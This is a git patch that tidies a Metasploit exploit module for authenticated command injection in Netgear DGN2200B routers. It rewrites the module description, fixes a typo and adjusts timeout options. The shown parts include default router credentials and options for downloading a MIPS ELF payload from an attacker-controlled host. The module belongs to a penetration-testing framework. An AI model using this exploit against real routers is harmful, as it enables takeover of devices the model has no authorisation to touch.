From 19a158dce9ffbe35976201c977cfaddccc13ff1e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 19 Apr 2013 15:50:13 -0500 Subject: [PATCH] Do final cleanup for netgear_dgn2200b_pppoe_exec --- .../linux/http/netgear_dgn2200b_pppoe_exec.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index a58b819dbc..307d656365 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Netgear DGN2200B pppoe.cgi Remote Command Execution', 'Description' => %q{ - Some Netgear Routers are vulnerable to an authenticated OS command injection. - Default credentials for the web interface are admin/admin or admin/password. - Since it is a blind os command injection vulnerability, there is no output for the - executed command when using the cmd generic payload. A ping command against a - controlled system could be used for testing purposes. - - WARNING: We overwrite parts of the PPPOE configuration! Backup it prior using this module! + Some Netgear Routers are vulnerable to an authenticated OS command injection + on their web interface. Default credentials for the web interface are admin/admin + or admin/password. Since it is a blind os command injection vulnerability, there + is no output for the executed command when using the cmd generic payload. A ping + command against a controlled system could be used for testing purposes. This module + overwrites parts of the PPOE configuration, while the module tries to restore it + after exploitation configuration backup is recommended. }, 'Author' => [ @@ -71,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), - OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 45]) + OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), + OptInt.new('RELOAD_CONF_DELAY', [true, 'Time to wait to allow the remote device to load configuration', 45]) ], self.class) end @@ -96,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote end if [200, 301, 302].include?(res.code) if res.body =~ /pppoe_username/ - print_good("#{rhost}:#{rport} - Successful downloaded the configuration") + print_good("#{rhost}:#{rport} - Successfully downloaded the configuration") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported") end @@ -157,7 +158,6 @@ class Metasploit3 < Msf::Exploit::Remote #&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05 #&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0 #&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0 - res = send_request_cgi( { 'uri' => uri, @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = '/pppoe.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] - @timeout = datastore['HTTP_DELAY'] + @timeout = datastore['RELOAD_CONF_DELAY'] # # testing Login